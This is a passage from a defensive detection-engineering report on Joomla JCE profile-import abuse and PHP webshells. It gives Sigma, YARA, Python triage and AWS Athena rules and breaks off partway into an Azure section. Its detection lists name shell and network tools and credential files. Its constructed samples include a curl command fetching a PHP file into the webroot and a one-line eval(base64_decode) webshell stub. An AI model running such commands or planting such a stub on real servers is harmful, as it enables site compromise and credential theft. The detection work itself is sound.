OR LOWER(FILEPATH) LIKE '%/media/%.php%'
OR LOWER(FILEPATH) LIKE '%/uploads/%.php%'
OR LOWER(FILEPATH) LIKE '%/cache/%.php%'
OR LOWER(FILEPATH) LIKE '%/templates/%.php%'
OR LOWER(FILEPATH) LIKE '%/plugins/%.php%'
OR PROCESSNAME IN ('sh','bash','dash','zsh','python','python3','perl','ruby','php','curl','wget','nc','ncat','socat','ssh','scp','tar','zip','7z','openssl')
OR (DESTINATIONDOMAIN IS NOT NULL AND NOT REFERENCESETCONTAINS('ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS', DESTINATIONDOMAIN))
)
LAST 60 MINUTES
OFFENSE RULE CONDITION:
Building block one and either building block two or building block three occur on the same JOOMLA_SITE, VIRTUALHOST, or BACKENDHOST within 60 minutes outside approved maintenance.
CRITICAL PROMOTION CONDITION:
Credential-file access, database dump activity, confirmed webshell artifact, phishing or malware hosting, hosted-content modification, multiple-site compromise, FTP abuse, or hosting-control abuse occurs within 120 minutes of the high-severity offense.
SIGMA
Detection Viability Assessment
Production-deployable after conversion and local enrichment where endpoint process telemetry is collected from Joomla web servers. SIGMA is appropriate for portable host detection of suspicious web server service-context execution and should be promoted through the target SIEM only when joined with JCE web activity, file telemetry, CMS profile evidence, or webshell artifact evidence.
Rule
Joomla Web Server Suspicious Service Context Execution
Rule Format
SIGMA portable process-creation rule requiring target-SIEM conversion, Joomla host enrichment, and local exception logic.
Detection Purpose
Detect suspicious shell, scripting, transfer, archive, network, encoding, or credential-related process execution from the Joomla web server service context.
Detection Logic
Trigger when a web server parent process or web server service account spawns suspicious interpreters, transfer tools, remote-access tools, archive utilities, encoded commands, credential-file access, or webroot reconnaissance commands on a Joomla server.
Assign medium severity for standalone converted rule matches.
Promote to high severity in the target SIEM when correlated with JCE profile-import activity, writable-path PHP file creation, webshell access, sensitive Joomla file reads, rare egress, FTP activity, or hosting-control activity.
Required Telemetry
Process creation telemetry.
Command-line telemetry.
Parent process telemetry.
User field.
Host asset enrichment.
Joomla web server enrichment.
Web server service account enrichment.
Approved Joomla command-pattern exceptions.
Approved deployment-user exceptions.
Approved maintenance-window exceptions.
Engineering Implementation Instructions
Convert to the target SIEM.
Map Image, ParentImage, CommandLine, User, Hostname, CurrentDirectory, EventID, and process creation timestamp.
Add Joomla server asset enrichment after conversion.
Add web server service-account enrichment after conversion.
Add approved deployment, backup, migration, CMS update, plugin update, malware scanning, emergency cleanup, and vulnerability validation exceptions after conversion.
Do not deploy as high or critical severity without correlation logic in the target SIEM.
Treat target-SIEM conversion, field mapping, host enrichment, exception logic, and correlation-layer promotion as required local deployment work.
DRI Assessment
Medium to high after conversion and Joomla host enrichment.
DRI
8.1 / 10
TCR Assessment
Good for portable endpoint detection. Stronger when joined with JCE web activity, file telemetry, CMS profile evidence, DNS, proxy, WAF, or hosting-control telemetry.
Operational TCR
7.8 / 10
Full-Telemetry TCR
8.9 / 10
Limitations
Legitimate Joomla administration, deployments, plugin updates, backups, migrations, security scans, cleanup work, and hosting-provider maintenance may execute shells, scripts, transfer tools, archive tools, and PHP commands. Host scoping and approved workflow exceptions are required.
Detection Query Pattern
SIGMA event-rule template requiring local backend conversion, field mapping, enrichment, and SIEM-native correlation:
title: Joomla Web Server Service Execution and Writable PHP Artifact Indicators
id: 00000000-0000-4000-8000-joomla-jce-webshell-template   # placeholder, not a valid UUID; generate a UUIDv4 before deployment
status: test
description: Detects web server service-context process execution, suspicious command activity, writable PHP artifact interaction, or sensitive Joomla file access that may indicate PHP webshell execution after Joomla JCE profile-import abuse.
references:
  - https://www.joomla.org/
author: CyberDax
date: 2026/06/17
logsource:
  product: linux
  category: process_creation
detection:
  selection_web_parent:
    ParentImage|contains:
      - '/apache2'
      - '/httpd'
      - '/nginx'
      - '/php-fpm'
      - '/lsphp'
      - '/php-cgi'
      - '/cgi-fcgi'
      - '/litespeed'
      - '/openlitespeed'
  selection_web_user:
    User|contains:
      - 'www-data'
      - 'apache'
      - 'nginx'
      - 'nobody'
      - 'litespeed'
  selection_suspicious_child:
    Image|endswith:
      - '/sh'
      - '/bash'
      - '/dash'
      - '/zsh'
      - '/python'
      - '/python3'
      - '/perl'
      - '/ruby'
      - '/php'
      - '/curl'
      - '/wget'
      - '/nc'
      - '/ncat'
      - '/socat'
      - '/ssh'
      - '/scp'
      - '/tar'
      - '/zip'
      - '/7z'
      - '/openssl'
  selection_command_indicators:
    CommandLine|contains:
      - 'configuration.php'
      - '/var/www/'
      - '/public_html/'
      - 'mysqldump'
      - 'base64'
      - 'curl '
      - 'wget '
      - 'bash -c'
      - '/bin/sh -c'
      - '/tmp/'
      - '/images/'
      - '/media/'
      - '/uploads/'
      - '/cache/'
      - '/templates/'
      - '/plugins/'
      - '.php'
      - '.phtml'
      - '.phar'
  condition: (selection_web_parent or selection_web_user) and (selection_suspicious_child or selection_command_indicators)
fields:
  - Image
  - ParentImage
  - CommandLine
  - User
  - host.name
  - event.category
  - event.type
falsepositives:
  - Approved Joomla plugin updates
  - Approved Joomla migrations
  - Approved backup or restore jobs
  - Approved vulnerability validation
  - Hosting-provider support activity
  - Emergency cleanup or incident response activity
# Standalone converted matches are medium; promotion to high happens only through SIEM correlation.
level: medium
tags:
  - attack.t1059
  - attack.t1105
  - attack.t1505.003
  - attack.t1190
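To check the rule's selections and condition before conversion, the following added example (not part of the original report or of the Sigma project) reimplements the four selections in plain Python and runs them over constructed process-creation events. The host names, paths and addresses in the sample events and the approved command-pattern exception are assumptions for the example; the fifth event shows why the report requires such exceptions, since an ImageMagick thumbnail job touches '/tmp/' and '/images/' from the web user.

```python
"""Evaluate the Sigma rule's selection logic over process-creation events.

Sigma string matching is case-insensitive unless the |cased modifier is used,
so both sides are lower-cased here.
"""

WEB_PARENTS = ["/apache2", "/httpd", "/nginx", "/php-fpm", "/lsphp",
               "/php-cgi", "/cgi-fcgi", "/litespeed", "/openlitespeed"]
WEB_USERS = ["www-data", "apache", "nginx", "nobody", "litespeed"]
SUSPICIOUS_CHILDREN = ["/sh", "/bash", "/dash", "/zsh", "/python", "/python3", "/perl",
                       "/ruby", "/php", "/curl", "/wget", "/nc", "/ncat", "/socat",
                       "/ssh", "/scp", "/tar", "/zip", "/7z", "/openssl"]
COMMAND_INDICATORS = ["configuration.php", "/var/www/", "/public_html/", "mysqldump",
                      "base64", "curl ", "wget ", "bash -c", "/bin/sh -c", "/tmp/",
                      "/images/", "/media/", "/uploads/", "/cache/", "/templates/",
                      "/plugins/", ".php", ".phtml", ".phar"]


def _contains(value, needles):
    value = value.lower()
    return any(n in value for n in needles)


def _endswith(value, needles):
    value = value.lower()
    return any(value.endswith(n) for n in needles)


def evaluate(event):
    """Return which selections fired and whether the rule condition is satisfied."""
    web_parent = _contains(event.get("ParentImage", ""), WEB_PARENTS)
    web_user = _contains(event.get("User", ""), WEB_USERS)
    child = _endswith(event.get("Image", ""), SUSPICIOUS_CHILDREN)
    cmd = _contains(event.get("CommandLine", ""), COMMAND_INDICATORS)
    return {
        "web_parent": web_parent,
        "web_user": web_user,
        "suspicious_child": child,
        "command_indicators": cmd,
        # condition: (selection_web_parent or selection_web_user) and
        #            (selection_suspicious_child or selection_command_indicators)
        "match": (web_parent or web_user) and (child or cmd),
    }


def triage(events, exceptions):
    """Apply the rule plus local exceptions; standalone matches are medium severity only."""
    findings = []
    for idx, ev in enumerate(events):
        if not evaluate(ev)["match"]:
            continue
        # An exception suppresses the event when every field it names matches exactly.
        if any(all(ev.get(k) == v for k, v in exc.items()) for exc in exceptions):
            continue
        findings.append((idx, "medium"))
    return findings


# Constructed sample events (hypothetical hosts, paths and addresses).
SAMPLE_EVENTS = [
    {"ParentImage": "/usr/sbin/apache2", "Image": "/bin/sh", "User": "www-data",
     "CommandLine": "sh -c 'cat /var/www/html/configuration.php'"},
    {"ParentImage": "/usr/sbin/php-fpm8.2", "Image": "/usr/bin/curl", "User": "www-data",
     "CommandLine": "curl -s http://203.0.113.10/x.txt -o /var/www/html/images/x.php"},
    {"ParentImage": "/usr/sbin/cron", "Image": "/usr/bin/php", "User": "root",
     "CommandLine": "php /var/www/html/cli/finder_indexer.php"},
    {"ParentImage": "/bin/bash", "Image": "/usr/bin/git", "User": "deploy",
     "CommandLine": "git pull --ff-only"},
    {"ParentImage": "/usr/sbin/apache2", "Image": "/usr/bin/convert", "User": "www-data",
     "CommandLine": "convert /tmp/phpA1b2.jpg -resize 800x600 /var/www/html/images/thumb.jpg"},
]

# Hypothetical approved command-pattern exception: ImageMagick thumbnails generated by the web user.
LOCAL_EXCEPTIONS = [{"User": "www-data", "Image": "/usr/bin/convert"}]

if __name__ == "__main__":
    for idx, sev in triage(SAMPLE_EVENTS, LOCAL_EXCEPTIONS):
        print(sev, SAMPLE_EVENTS[idx]["CommandLine"])
```

The cron-launched PHP CLI job and the deploy user's git pull never match because neither a web server parent nor a web service account is involved; the thumbnail job matches on command-line indicators alone and is only kept out by the local exception.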
YARA
Detection Viability Assessment
Production-usable for artifact triage and webroot scanning. YARA should not be treated as primary detection for JCE exploitation. It is viable for identifying suspicious PHP webshell-like artifacts, obfuscated PHP, credential-access logic, and command-execution functions in Joomla writable directories, templates, plugins, backups, forensic exports, and suspicious uploaded files.
Rule
Joomla Suspicious PHP Webshell or Credential Access Artifact
Rule Format
YARA artifact-scanning rule for Joomla webroots, writable directories, template directories, plugin directories, backup exports, and forensic images.
Detection Purpose
Detect suspicious PHP artifacts containing combinations of command execution, upload handling, credential-file access, obfuscation, outbound staging, or webshell control behavior.
Detection Logic
Trigger when files under Joomla webroot, writable directories, templates, plugins, cache, uploads, tmp, media, images, backups, or forensic exports contain combinations of PHP execution functions, shell invocation, request-controlled parameters, encoding behavior, credential-file references, or outbound staging logic.
Assign medium severity for standalone matches.
Promote to high severity when the matched file is newly created, modified outside maintenance, located in a directory that should not contain PHP, associated with suspicious JCE profile-import activity, accessed over HTTP, or owned by the web server service user.
Do not use this YARA rule as standalone proof of compromise. Treat it as an artifact-triage accelerator requiring path, timestamp, owner, HTTP access, CMS profile state, and telemetry correlation.
Required Telemetry
Joomla webroot file exports.
Writable directory file exports.
Template and plugin directory exports.
Backup and forensic exports.
File modification timestamps.
File owner and permission metadata.
Approved Joomla file inventory.
Approved template inventory.
Approved plugin inventory.
Approved maintenance-window records.
Forensic collection workflow.
Engineering Implementation Instructions
Use this rule in controlled scanning workflows and forensic triage, not as primary live exploit detection.
Scan Joomla webroots, tmp, images, media, uploads, cache, templates, plugins, extension directories, suspicious archives, backup exports, and forensic images.
Tune approved templates, known plugins, deployment artifacts, security tools, backup files, and legitimate PHP administration scripts before alerting.
Correlate YARA hits with JCE profile-import requests, HTTP access to the matched file, file modification time, owner, CMS profile state, endpoint telemetry, FTP logs, hosting-control logs, WAF logs, and web server access logs.
Treat file collection, scanner integration, path scoping, approved-script exceptions, timestamp review, owner validation, and triage routing as required local deployment work.
DRI Assessment
Moderate for artifact review and webshell triage. Low for live exploit detection.
DRI
7.2 / 10
TCR Assessment
Useful when matched artifacts are newly created, unapproved, web-accessed, located in non-executable directories, or correlated with suspicious JCE behavior. Not sufficient as standalone proof of compromise.
Operational TCR
6.9 / 10
Full-Telemetry TCR
8.4 / 10
Limitations
YARA cannot reliably detect network exploitation or runtime PHP execution without recoverable artifacts. Legitimate Joomla plugins, templates, backup tools, admin scripts, and security tools may contain PHP execution, HTTP, encoding, or file-management functions.
Detection Query Pattern
YARA file-content rule for PHP webshell-like artifact triage:
rule Joomla_PHP_Webshell_Like_Artifact_Upload_Execution_Encoding_Network
{
    meta:
        description = "Detects PHP webshell-like artifacts with request-driven execution, upload handling, encoding, file-management, or network retrieval behavior in Joomla webroot triage."
        author = "CyberDax"
        date = "2026-06-17"
        scope = "Artifact triage and retrospective webroot scanning"
        confidence = "Medium to High when correlated with Joomla writable path or JCE import activity"

    strings:
        $php_1 = "<?php" ascii wide
        $php_2 = "<?=" ascii wide
        $req_1 = "$_GET[" ascii wide
        $req_2 = "$_POST[" ascii wide
        $req_3 = "$_REQUEST[" ascii wide
        $req_4 = "$_COOKIE[" ascii wide
        $req_5 = "$_FILES[" ascii wide
        $exec_1 = "eval(" ascii wide
        $exec_2 = "assert(" ascii wide
        $exec_3 = "system(" ascii wide
        $exec_4 = "exec(" ascii wide
        $exec_5 = "shell_exec(" ascii wide
        $exec_6 = "passthru(" ascii wide
        $exec_7 = "popen(" ascii wide
        $exec_8 = "proc_open(" ascii wide
        $exec_9 = "create_function(" ascii wide
        $shell_1 = "/bin/sh" ascii wide
        $shell_2 = "/bin/bash" ascii wide
        $shell_3 = "cmd.exe" ascii wide
        $shell_4 = "powershell" ascii wide
        $shell_5 = "bash -c" ascii wide
        $shell_6 = "sh -c" ascii wide
        $enc_1 = "base64_decode(" ascii wide
        $enc_2 = "gzinflate(" ascii wide
        $enc_3 = "gzuncompress(" ascii wide
        $enc_4 = "str_rot13(" ascii wide
        $enc_5 = "chr(" ascii wide
        $enc_6 = "pack(" ascii wide
        $enc_7 = "preg_replace(" ascii wide
        // preg_replace() "/pattern/e" modifier: delimiter, optional flags, 'e', closing quote.
        // A bare "/e" literal would also match ordinary paths such as /etc or /en/.
        $enc_8 = /\/[A-Za-z]*e['"]\s*,/ ascii wide
        $upload_1 = "move_uploaded_file(" ascii wide
        $upload_2 = "is_uploaded_file(" ascii wide
        $upload_3 = "$_FILES" ascii wide
        $upload_4 = "multipart/form-data" ascii wide
        $file_1 = "file_put_contents(" ascii wide
        $file_2 = "fwrite(" ascii wide
        $file_3 = "fopen(" ascii wide
        $file_4 = "unlink(" ascii wide
        $file_5 = "chmod(" ascii wide
        $file_6 = "scandir(" ascii wide
        $file_7 = "readdir(" ascii wide
        $file_8 = "opendir(" ascii wide
        $net_1 = "curl_init(" ascii wide
        $net_2 = "fsockopen(" ascii wide
        $net_3 = "file_get_contents(\"http" ascii wide
        $net_4 = "stream_socket_client(" ascii wide
        $net_5 = "socket_create(" ascii wide
        $joomla_path_1 = "/images/" ascii wide
        $joomla_path_2 = "/media/" ascii wide
        $joomla_path_3 = "/cache/" ascii wide
        $joomla_path_4 = "/templates/" ascii wide
        $joomla_path_5 = "/plugins/" ascii wide
        $joomla_path_6 = "/administrator/" ascii wide
        $joomla_path_7 = "configuration.php" ascii wide

    condition:
        any of ($php_*) and
        (
            // request-controlled input reaching an execution function
            (
                1 of ($req_*) and
                1 of ($exec_*) and
                (
                    1 of ($shell_*) or
                    1 of ($enc_*) or
                    1 of ($upload_*) or
                    1 of ($file_*) or
                    1 of ($net_*)
                )
            )
            or
            // upload handler that also writes files and executes, decodes, or calls out
            (
                1 of ($upload_*) and
                1 of ($file_*) and
                (
                    1 of ($exec_*) or
                    1 of ($enc_*) or
                    1 of ($net_*)
                )
            )
            or
            // Joomla path reference plus an execution function plus one further behavior.
            // "N of" counts individual strings, not string sets, so a looser "2 of" across
            // all sets would be satisfied by two ordinary file functions in a core file.
            (
                1 of ($joomla_path_*) and
                1 of ($exec_*) and
                1 of ($req_*, $shell_*, $enc_*, $upload_*, $file_*, $net_*)
            )
        )
}
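The promotion step the report describes (medium for a content match alone, high when path, timestamp, owner or HTTP access also point the wrong way) is where YARA output becomes a triage decision. The following added example, not part of the original report or of YARA itself, mirrors the rule's string categories in plain Python, applies its three match branches (the Joomla-path branch requires an execution function plus one other category, because YARA's "N of" counts strings rather than categories) and then scores constructed artifacts with those promotion checks. The list of directories that should not contain PHP and the 24-hour "recently modified" threshold are assumptions for the example; the three sample files are constructed, the first being a minimal webshell-like stub.

```python
"""Triage PHP artifacts with the YARA rule's string categories and the report's promotion logic."""
import re

CATEGORIES = {
    "php": ["<?php", "<?="],
    "req": ["$_GET[", "$_POST[", "$_REQUEST[", "$_COOKIE[", "$_FILES["],
    "exec": ["eval(", "assert(", "system(", "exec(", "shell_exec(", "passthru(",
             "popen(", "proc_open(", "create_function("],
    "shell": ["/bin/sh", "/bin/bash", "cmd.exe", "powershell", "bash -c", "sh -c"],
    "enc": ["base64_decode(", "gzinflate(", "gzuncompress(", "str_rot13(", "chr(",
            "pack(", "preg_replace("],
    "upload": ["move_uploaded_file(", "is_uploaded_file(", "$_FILES", "multipart/form-data"],
    "file": ["file_put_contents(", "fwrite(", "fopen(", "unlink(", "chmod(", "scandir(",
             "readdir(", "opendir("],
    "net": ["curl_init(", "fsockopen(", 'file_get_contents("http', "stream_socket_client(",
            "socket_create("],
    "joomla_path": ["/images/", "/media/", "/cache/", "/templates/", "/plugins/",
                    "/administrator/", "configuration.php"],
}
# preg_replace() "/pattern/e" modifier: a delimiter, optional flags, 'e', then the closing quote.
PREG_E_MODIFIER = re.compile(r"/[A-Za-z]*e['\"]\s*,")

NON_PHP_DIRS = ("/images/", "/media/", "/uploads/", "/tmp/", "/cache/")  # assumption
RECENT_SECONDS = 24 * 3600                                                # assumption


def classify(content):
    """Map each category to the needles found in the file content."""
    found = {name: [n for n in needles if n in content] for name, needles in CATEGORIES.items()}
    if PREG_E_MODIFIER.search(content):
        found["enc"].append("/e modifier")
    return found


def match_branch(content):
    """Return the name of the first rule branch satisfied, or None."""
    c = classify(content)
    if not c["php"]:
        return None
    if c["req"] and c["exec"] and (c["shell"] or c["enc"] or c["upload"] or c["file"] or c["net"]):
        return "request_driven_execution"
    if c["upload"] and c["file"] and (c["exec"] or c["enc"] or c["net"]):
        return "upload_and_file_management"
    other = [k for k in ("req", "shell", "enc", "upload", "file", "net") if c[k]]
    if c["joomla_path"] and c["exec"] and other:
        return "joomla_path_with_execution"
    return None


def triage_artifact(artifact, now, web_user="www-data"):
    """Medium for a content match alone; high when any promotion condition also holds."""
    branch = match_branch(artifact["content"])
    if branch is None:
        return {"path": artifact["path"], "branch": None, "severity": "none", "reasons": []}
    reasons = []
    if now - artifact["mtime"] <= RECENT_SECONDS:
        reasons.append("recently_modified")
    if any(d in artifact["path"] for d in NON_PHP_DIRS):
        reasons.append("php_in_non_php_directory")
    if artifact["owner"] == web_user:
        reasons.append("owned_by_web_service_user")
    if artifact.get("http_hits", 0) > 0:
        reasons.append("accessed_over_http")
    return {"path": artifact["path"], "branch": branch,
            "severity": "high" if reasons else "medium", "reasons": reasons}


NOW = 1_782_000_000  # constructed reference time (epoch seconds)
SAMPLES = [  # constructed files: a webshell-like stub, a benign plugin helper, a legacy uploader
    {"path": "/var/www/html/images/stories/thumb.php", "owner": "www-data",
     "mtime": NOW - 3600, "http_hits": 3,
     "content": '<?php if (isset($_POST["c"])) { eval(base64_decode($_POST["c"])); }'},
    {"path": "/var/www/html/plugins/system/acme/acme.php", "owner": "root",
     "mtime": NOW - 90 * 86400, "http_hits": 0,
     "content": "<?php\ndefined('_JEXEC') or die;\n$log = JPATH_ROOT . '/administrator/logs/acme.log';\n"
                "$fh = fopen($log, 'a'); fwrite($fh, date('c'));\nif (isset($_GET['reset'])) { unlink($log); }"},
    {"path": "/var/www/html/templates/cassiopeia/uploader.php", "owner": "root",
     "mtime": NOW - 30 * 86400, "http_hits": 0,
     "content": '<?php\nif (isset($_FILES["f"])) { move_uploaded_file($_FILES["f"]["tmp_name"], __DIR__ . "/u/x"); }\n'
                '$fp = fsockopen("updates.example.invalid", 443);\nfile_put_contents(__DIR__ . "/u/manifest", fread($fp, 8192));'},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage_artifact(sample, NOW))
```

The benign plugin helper contains a Joomla path, a request superglobal and three file functions yet no execution function, so it stays out; counting individual strings across all sets instead would have flagged it. The uploader matches on content and stays at medium because it is old, root-owned, in a template directory and never served over HTTP, which is exactly the kind of hit the report says must be resolved by correlation rather than treated as proof of compromise.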
AWS
Detection Viability Assessment
Production-deployable only when Joomla is hosted on AWS and AWS telemetry can be joined with application-layer logs, WAF or ALB logs, endpoint telemetry, asset mapping, and workload identity. AWS control-plane logs alone are not sufficient to detect JCE exploitation or PHP webshell execution.
Rule
AWS Hosted Joomla JCE Profile Import With PHP Access Egress or Hosting Impact
Rule Format
AWS Athena / CloudTrail / ALB / WAF / Route 53 / VPC Flow correlation pattern requiring Joomla asset and identity mapping.
Detection Purpose
Detect AWS-hosted Joomla JCE profile-import activity that aligns with PHP-like file access, rare egress, endpoint-confirmed execution, or suspicious AWS activity from a mapped Joomla workload.
Detection Logic
Trigger when an AWS-hosted Joomla asset receives suspicious JCE profile-import activity and the same Joomla host private IP, EC2 instance, ECS task, EKS pod, target group, instance profile, task role, or Joomla-linked workload identity performs rare egress or high-risk AWS activity within 120 minutes.
Assign medium severity for rare egress from AWS-hosted Joomla workloads.
Assign high severity when rare egress or high-risk AWS activity aligns with suspicious JCE profile-import activity on a mapped Joomla asset.
Promote to critical when the Joomla-linked identity accesses Secrets Manager, Parameter Store, S3 backups, mail infrastructure, ECR images, CloudFormation, IAM, production storage, or other sensitive services outside approved maintenance and with linkage to the affected Joomla host.
Required Telemetry
AWS asset inventory.
EC2 tags.
ECS or EKS workload labels where applicable.
ALB access logs.
CloudFront logs where applicable.
AWS WAF logs.
VPC Flow Logs.
Route 53 Resolver query logs.
CloudTrail.
EDR telemetry from Joomla hosts.
Web server logs or reverse-proxy logs.
Approved Joomla IAM role lookup.
Approved Joomla instance profile lookup.
Approved maintenance-window lookup.
Approved egress-destination lookup.
Approved Joomla asset lookup.
Engineering Implementation Instructions
Map Joomla assets to EC2 instance IDs, private IPs, ECS tasks, EKS pods, target groups, ALB targets, CloudFront distributions, WAF web ACLs, IAM roles, instance profiles, task roles, security groups, NAT gateways, Route 53 Resolver sources, and hosted zones.
Validate that ALB, CloudFront, WAF, reverse-proxy, or web server logs preserve Joomla URI paths and query strings before enabling high severity.
Create lookups for approved Joomla IAM roles, approved Joomla instance profiles, approved maintenance windows, approved deployment actions, approved egress destinations, approved production accounts, approved Joomla assets, and approved hosting-provider sources.
Do not attribute AWS-only anomalies to Joomla/JCE compromise without Joomla asset identity, workload identity, web request, file, endpoint, or time-window correlation.
Treat AWS asset tagging, log-source joins, CloudTrail identity mapping, URI-log validation, endpoint correlation, identity-to-host mapping, and maintenance-window tuning as required local deployment work.
DRI Assessment
Moderate to high with ALB/WAF URI logs, web logs, EDR telemetry, Route 53 logs, VPC Flow Logs, asset mapping, and CloudTrail identity mapping.
DRI
7.8 / 10
TCR Assessment
Moderate operational confidence for AWS-only egress. High confidence when Joomla web activity joins to PHP access, endpoint execution, sensitive AWS API use, or workload identity activity linked to the affected host.
Operational TCR
7.4 / 10
Full-Telemetry TCR
8.9 / 10
Limitations
VPC Flow Logs do not show URI paths or process context. CloudTrail does not show Joomla local request handling or PHP execution. Production use requires application-layer and host telemetry; AWS control-plane, flow, DNS, or identity activity should not be treated as proof of Joomla/JCE compromise without web, host, workload, identity, file, or time-window correlation. Critical severity requires Joomla-linked identity or host-to-identity mapping, not time proximity alone.
Detection Query Pattern
AWS Athena / SQL-style correlation pattern requiring local table names, workload identity mapping, maintenance-window enrichment, and field validation:
WITH joomla_assets AS (
SELECT
joomla_site_id,
instance_id,
private_ip,
account_id
FROM ENV_AWS_JOOMLA_JCE_ASSETS
),
joomla_workload_identities AS (
SELECT
joomla_site_id,
account_id,
identity_arn,
identity_type,
assumed_role_pattern,
service_context
FROM ENV_AWS_JOOMLA_WORKLOAD_IDENTITY_MAP
),
suspicious_jce_uri AS (
SELECT
from_iso8601_timestamp(alb.time) AS event_time, -- ALB access-log time is an ISO 8601 string, not an epoch value
alb.target_ip,
alb.target_status_code,
alb.client_ip,
alb.request_verb,
alb.request_url,
alb.user_agent,
ja.joomla_site_id,
ja.instance_id,
ja.account_id,
'jce_profile_import' AS signal
FROM ENV_AWS_ALB_ACCESS_LOGS alb
JOIN joomla_assets ja
ON alb.target_ip = ja.private_ip
LEFT JOIN ENV_APPROVED_JOOMLA_ADMIN_SOURCES admin_src
ON alb.client_ip = admin_src.source_ip
LEFT JOIN ENV_APPROVED_JOOMLA_SCANNERS scanner_src
ON alb.client_ip = scanner_src.source_ip
LEFT JOIN ENV_APPROVED_HOSTING_PROVIDER_SOURCES hosting_src
ON alb.client_ip = hosting_src.source_ip
WHERE alb.request_verb = 'POST'
AND alb.request_url LIKE '%option=com_jce%'
AND alb.request_url LIKE '%task=profiles.import%'
AND admin_src.source_ip IS NULL
AND scanner_src.source_ip IS NULL
AND hosting_src.source_ip IS NULL
),
rare_egress AS (
SELECT
from_unixtime(v.start) AS event_time,
v.srcaddr,
v.dstaddr,
v.dstport,
v.action,
ja.joomla_site_id,
ja.instance_id,
ja.account_id,
'rare_joomla_egress' AS signal
FROM ENV_AWS_VPC_FLOW_LOGS v
JOIN joomla_assets ja
ON v.srcaddr = ja.private_ip
LEFT JOIN ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS approved_egress
ON v.dstaddr = approved_egress.ip
WHERE v.action = 'ACCEPT'
AND approved_egress.ip IS NULL
AND v.dstaddr IS NOT NULL
AND v.dstaddr <> ''
),
cloudtrail_identity_candidates AS (
SELECT
from_iso8601_timestamp(c.eventtime) AS event_time, -- CloudTrail eventtime is a string; convert before the BETWEEN comparisons below
c.useridentity.arn AS principal_arn,
c.useridentity.principalid AS principal_id,
c.useridentity.type AS principal_type,
c.recipientaccountid AS account_id,
c.eventname,
c.eventsource,
c.awsregion,
c.sourceipaddress,
c.useragent,
c.requestparameters,
c.resources,
c.readonly
FROM ENV_AWS_CLOUDTRAIL c
WHERE c.eventname IN (
'GetSecretValue',
'GetParameter',
'GetParameters',
'PutParameter',
'GetObject',
'PutObject',
'DeleteObject',
'SendRawEmail',
'SendEmail',
'CreateAccessKey',
'AttachRolePolicy',
'PutRolePolicy',
'AssumeRole',
'UpdateFunctionCode',
'UpdateStack',
'CreateStack',
'DeleteStack'
)
),
high_risk_cloudtrail AS (
SELECT
c.event_time,
c.principal_arn,
c.principal_id,
c.principal_type,
c.eventname,
c.eventsource,
c.awsregion,
c.sourceipaddress,
c.useragent,
wi.joomla_site_id,
wi.account_id,
wi.identity_type,
wi.service_context,
'joomla_linked_aws_activity' AS signal
FROM cloudtrail_identity_candidates c
JOIN joomla_workload_identities wi
ON c.account_id = wi.account_id
AND (
c.principal_arn = wi.identity_arn
OR c.principal_arn LIKE wi.assumed_role_pattern
OR c.principal_id LIKE wi.assumed_role_pattern
)
LEFT JOIN ENV_APPROVED_AWS_JOOMLA_MAINTENANCE_WINDOWS mw
ON wi.joomla_site_id = mw.joomla_site_id
AND c.event_time BETWEEN mw.window_start AND mw.window_end
WHERE mw.joomla_site_id IS NULL
),
correlated_activity AS (
SELECT
s.event_time AS uri_time,
s.joomla_site_id,
s.instance_id,
s.account_id,
s.client_ip,
s.request_url,
s.user_agent,
e.event_time AS egress_time,
e.dstaddr,
e.dstport,
c.event_time AS cloudtrail_time,
c.principal_arn,
c.principal_type,
c.identity_type,
c.service_context,
c.eventname,
c.eventsource,
c.awsregion,
c.sourceipaddress,
c.signal AS cloudtrail_signal,
e.signal AS egress_signal
FROM suspicious_jce_uri s
LEFT JOIN rare_egress e
ON s.joomla_site_id = e.joomla_site_id
AND e.event_time BETWEEN s.event_time AND s.event_time + INTERVAL '120' MINUTE
LEFT JOIN high_risk_cloudtrail c
ON s.joomla_site_id = c.joomla_site_id
AND c.event_time BETWEEN s.event_time AND s.event_time + INTERVAL '120' MINUTE
)
SELECT
uri_time,
joomla_site_id,
instance_id,
account_id,
client_ip,
request_url,
user_agent,
egress_time,
dstaddr,
dstport,
cloudtrail_time,
principal_arn,
principal_type,
identity_type,
service_context,
eventname,
eventsource,
awsregion,
sourceipaddress,
CASE
WHEN cloudtrail_signal IS NOT NULL THEN 'high'
WHEN egress_signal IS NOT NULL THEN 'medium'
ELSE 'informational'
END AS severity,
'Joomla JCE Profile Import Followed by AWS Workload or Network Activity' AS cyberdax_rule
FROM correlated_activity
WHERE egress_signal IS NOT NULL
OR cloudtrail_signal IS NOT NULL
Azure
Detection Viability Assessment
Production-deployable only when Joomla is hosted on Azure and Azure telemetry can be joined with application-layer logs, WAF or Application Gateway logs, endpoint telemetry, identity logs, and workload mapping. Azure Activity Logs alone are not sufficient.
Rule
Azure Hosted Joomla JCE Profile Import With Linked Egress Key Vault or Hosting Activity
Rule Format
Azure Monitor / Log Analytics KQL correlation pattern requiring Joomla asset and identity mapping.
Detection Purpose
Detect Azure-hosted Joomla JCE profile-import activity that aligns with rare egress or Joomla-linked identity activity involving Key Vault, storage, App Service, container registry, infrastructure modification, mail abuse, or production-impacting resources.
Detection Logic
Trigger when an Azure-hosted Joomla asset shows suspicious JCE profile-import activity and the same VM, workload, private IP, managed identity, service principal, or Joomla-linked identity shows rare egress or high-risk Azure activity within 120 minutes.
Assign medium severity for rare egress from Azure-hosted Joomla assets.
Assign high severity when rare egress or high-risk Azure activity aligns with suspicious JCE profile-import activity on a mapped Joomla asset.
Promote to critical when Joomla-linked identities access Key Vault secrets, alter production resources, modify web app settings, access storage backups, push container images, assign roles, or interact with mail or hosting services outside approved maintenance.
Required Telemetry
Application Gateway access logs.
Azure WAF logs.
Reverse-proxy logs where applicable.
Web server logs.
Defender for Endpoint telemetry from Joomla hosts.
NSG Flow Logs.
Azure DNS or proxy logs.
Azure Activity Logs.
Microsoft Entra ID logs.
Key Vault audit logs.
Storage audit logs where applicable.
Container Registry logs where applicable.
Approved Joomla service principal lookup.
Approved Joomla managed identity lookup.
Approved maintenance-window lookup.
Approved egress-destination lookup.
Approved Joomla asset lookup.
Engineering Implementation Instructions
Map Joomla assets to Azure VMs, VMSS instances, App Service instances, AKS workloads, private IPs, Application Gateway backend pools, WAF policies, managed identities, service principals, Key Vault access policies, storage accounts, container registries, and deployment targets.
Validate URI visibility in Application Gateway, WAF, reverse-proxy, or web server logs before enabling high severity.
Create approved Joomla identity, maintenance-window, egress-destination, resource-group, subscription, Key Vault, storage, container registry, and asset lookup tables.
